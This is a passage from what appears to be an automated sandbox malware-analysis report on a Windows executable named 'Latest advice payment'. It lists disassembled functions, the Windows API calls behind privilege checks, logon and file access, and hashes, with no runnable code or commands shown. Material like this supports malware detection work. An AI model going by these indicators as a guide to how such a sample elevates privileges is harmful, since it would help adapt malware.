                                                            • Opcode Fuzzy Hash: cf5aae26db3b0426f7bdab33ddfbf2f6047260d23d423caaf6e7371eefa03124
                                                            • Instruction Fuzzy Hash: AD1160B1414205AFE718EF54DC89D6BBBADFB44710B20952EF45697251DA30BC44CB60
                                                            Function 005B874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005B8774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005B878B
                                                            • FreeSid.ADVAPI32(?), ref: 005B879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 5341fa24532aee9b1799421abc3a998cba155e5a64b988b7a9e73f1108bc0872
                                                            • Instruction ID: 16256e48f37fc281a76dfb4e8b7e05e15557d37fdc0ecf7c4f1e13915b766d99
                                                            • Opcode Fuzzy Hash: 5341fa24532aee9b1799421abc3a998cba155e5a64b988b7a9e73f1108bc0872
                                                            • Instruction Fuzzy Hash: CEF04F7591130CFFDF04DFF4DC89ABDBBBCEF08211F1044A9A502E6181DA716A089B50
                                                            Function 005C8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __time64.LIBCMT ref: 005C889B
                                                              • Part of subcall function 0058520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,005C8F6E,00000000,?,?,?,?,005C911F,00000000,?), ref: 00585213
                                                              • Part of subcall function 0058520A: __aulldiv.LIBCMT ref: 00585233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0eb
                                                            • API String ID: 2893107130-1612489492
                                                            • Opcode ID: 845c1eb6eb562cbf8bb8ddfc0b5437cbd6ef897c336dffd49258ac2bd667f9c6
                                                            • Instruction ID: 547c4e9c502204ce46aa32193b86dd3a0a5895aeae2787f6f06579cb5e0438d7
                                                            • Opcode Fuzzy Hash: 845c1eb6eb562cbf8bb8ddfc0b5437cbd6ef897c336dffd49258ac2bd667f9c6
                                                            • Instruction Fuzzy Hash: B721A2326259108FC729CF65D841B62B7E1EFA5311B688E6CE4F5CB2C0CA74A906CB54
                                                            Function 005CC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005CC6FB
                                                            • FindClose.KERNEL32(00000000), ref: 005CC72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: a616da70c5af9774d530069ee01a50878a4a097acf9ba357b05f273bef8ccf76
                                                            • Instruction ID: 0f1aa6df494d4bb57c15beea7bce1a4ec304ab84806fab31e00b891485ea6807
                                                            • Opcode Fuzzy Hash: a616da70c5af9774d530069ee01a50878a4a097acf9ba357b05f273bef8ccf76
                                                            • Instruction Fuzzy Hash: BB11A5716002019FDB10DF29C889A2AFBE8FF85320F00851DF9A9C7290DB30AC05CF81
                                                            Function 005CA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,005D9468,?,005EFB84,?), ref: 005CA097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,005D9468,?,005EFB84,?), ref: 005CA0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 3dd53ec4cba98f7cead1aee0c49997efa3037c7332483b036b2d6412f35c8717
                                                            • Instruction ID: f2e78ab501562dcbe30e020ed00923436f0c126d9579cdc27fb145721d705f0c
                                                            • Opcode Fuzzy Hash: 3dd53ec4cba98f7cead1aee0c49997efa3037c7332483b036b2d6412f35c8717
                                                            • Instruction Fuzzy Hash: 9FF0823510522EABDB219FA4DC8CFEA7B6CFF08361F004569F909D7181DA309944CBA1
                                                            Function 005B81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005B8309), ref: 005B81E0
                                                            • CloseHandle.KERNEL32(?,?,005B8309), ref: 005B81F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 5db9ebbdbe401a29d75db5d6bf4a63a276e404edfe348ebc30fcdf60ba9365ba
                                                            • Instruction ID: d9b661636c710a52a80520a739feecda6eac1c3764ccbfb7e9d7a8c66d561d18
                                                            • Opcode Fuzzy Hash: 5db9ebbdbe401a29d75db5d6bf4a63a276e404edfe348ebc30fcdf60ba9365ba
                                                            • Instruction Fuzzy Hash: 6EE0EC72011611AFE7652B64EC09D777BEEFF44311714982DF8A6844B0DB62AC95EB10
                                                            Function 0058A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00588D57,?,?,?,00000001), ref: 0058A15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0058A163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 8a2d6fad10a7f0f3d3902022c06409f588cf1af2f233da1390c4b204e8aff146
                                                            • Instruction ID: bb6ed2a0c302fabb461d287870f44b5f36341ae83953a4fca074f9f04109e5c9
                                                            • Opcode Fuzzy Hash: 8a2d6fad10a7f0f3d3902022c06409f588cf1af2f233da1390c4b204e8aff146
                                                            • Instruction Fuzzy Hash: F8B09231054248ABCA042B91EC49B883F68EB58AA2F404420F64D88464CF625554AB91
                                                            Function 0058F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1712562a4f3ec31a165960fe620c2318c16a5111c330805919c31702d5835f7
                                                            • Instruction ID: 0977db3e8127631675e5e346b78e6236a02d83bea3f040f8efb40edf27a5a2f6
                                                            • Opcode Fuzzy Hash: f1712562a4f3ec31a165960fe620c2318c16a5111c330805919c31702d5835f7
                                                            • Instruction Fuzzy Hash: 1B32F221D29F454DD723A634D832336A649BFBB3D4F15D737EC1AB59A6EB28C4839200
                                                            Function 0059242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1360b22e177553d65d502c8ad8a68a10aa83536fc6754713e44b5a7b94c39ac
                                                            • Instruction ID: 5ee981cb6ea3688c4d83637ed01112cbb9436fa82b801f15b997a77be4be52a9
                                                            • Opcode Fuzzy Hash: e1360b22e177553d65d502c8ad8a68a10aa83536fc6754713e44b5a7b94c39ac
                                                            • Instruction Fuzzy Hash: 11B12360D2AF404DD72396388835336BB4CAFBB2C5F51DB1BFC1AB4D62EB2585879142
                                                            Function 005C4C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 005C4C76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 4158b3b01c072bddd6d5c0fac4064d393d5b0676359db6958d829046caedbb59
                                                            • Instruction ID: 316ad170197aff5aaf488271eb3c8a7e811329253c73bd3a0a43d003535ef53e
                                                            • Opcode Fuzzy Hash: 4158b3b01c072bddd6d5c0fac4064d393d5b0676359db6958d829046caedbb59
                                                            • Instruction Fuzzy Hash: 37D05EA01222093DEE2C07A08DBFFFA1909F3C0781F84854E7281890E0E8D45C00AC34
                                                            Function 005B87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,005B8389), ref: 005B87D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 4d09e9db5f3764666bd458d0d8a766f68d1f06f85acb6f57cebeb2f2d5a2b985
                                                            • Instruction ID: 34c0d1cac4d917db1252c72e78da9e60101e8ae72e5cd1639a18ddcd4d030b99
                                                            • Opcode Fuzzy Hash: 4d09e9db5f3764666bd458d0d8a766f68d1f06f85acb6f57cebeb2f2d5a2b985
                                                            • Instruction Fuzzy Hash: 50D05E3226050EABEF018EA4DC05EAE3B69EB04B01F408111FE16C50A1C775D835AB60
                                                            Function 0058A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0058A12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 3d0b7d07434018448947006b59eb928cede8b1d7994ca7f616c8e58fe115e39f
                                                            • Instruction ID: 8d2efff2950d1db3bd90d99a56e5287fa4338ea425d12b8cff0fe07366b1068a
                                                            • Opcode Fuzzy Hash: 3d0b7d07434018448947006b59eb928cede8b1d7994ca7f616c8e58fe115e39f
                                                            • Instruction Fuzzy Hash: D8A0113000020CAB8A002B82EC08888BFACEA082A0B008020F80C880228B32A820AA80
                                                            Function 00578808 Relevance: .6, Instructions: 590COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4b49c42d14cdd4488dc9f2732b508fa3a2164bd756351cb6fe183aaefbf0b1c
                                                            • Instruction ID: 98ef145b7af8a34203634909c05a628c1a91cc0622eb0ba30e4c48074f598ad7
                                                            • Opcode Fuzzy Hash: d4b49c42d14cdd4488dc9f2732b508fa3a2164bd756351cb6fe183aaefbf0b1c
                                                            • Instruction Fuzzy Hash: 43222730948506CBDF3C8A28E49C7BCBFA1FF41314F28C46AD55A87592EB70AD91EB41
                                                            Function 005821C5 Relevance: .3, Instructions: 345COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 454f209e6868f3f798f1b94ef0bd2b45ba54514d565c3165ba5df5ca2acd7f8a
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 64C1953620609309DF2D6639843513EFEA57EA27B171A4B5DDCB3EB1D4EE10C925D720
                                                            Function 005825FA Relevance: .3, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 60610a1b3b3479ecb2cfdd5853777156fee485452e16c9de02e9952b50c50f75
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: 87C196322065930ADF2D663AC43513EBEA17EA27B171A476DDCB3EB1D4EE10C925D720
                                                            Function 00581978 Relevance: .3, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: 66f7e0e1b458edca06715f6af8ade52a74d7b5183cdbe4c1131aa223cb78b39f
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 85C1943220649309DF2D5639C43513EBFA56EA27B131A4B6DDCB3EB1C4EE20C926D754
                                                            Function 010A59B0 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: c1dc1370fe6b69314593bbebb3c2b0d97337fe4b4f8266ad57e8f0b3c3b86bce
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: 6141D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB80
                                                            Function 010A58A0 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: 6c9019ed336f8aec8120dbc0b10b618d317567bb05cdf641f6aed7ac8ab33f02
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 9B018078A00209EFCB44DF99C5909AEF7F5FB48210B608599D859A7301D730AE41DB80
                                                            Function 010A5840 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: 9b9ee8713c6fa3aba8129de4561ecd8e1a83d45ecb580738efa8900363196e2d
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: C2018078A01109EFCB48DF99C9909AEF7F5FB48210F608599D849A7701D730AE41DB80
                                                            Function 010A41F0 Relevance: .0, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            Function 005D7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 005D785B
                                                            • DeleteObject.GDI32(00000000), ref: 005D786D
                                                            • DestroyWindow.USER32 ref: 005D787B
                                                            • GetDesktopWindow.USER32 ref: 005D7895
                                                            • GetWindowRect.USER32(00000000), ref: 005D789C
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005D79DD
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005D79ED
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7A35
                                                            • GetClientRect.USER32(00000000,?), ref: 005D7A41
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005D7A7B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7A9D
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7AB0
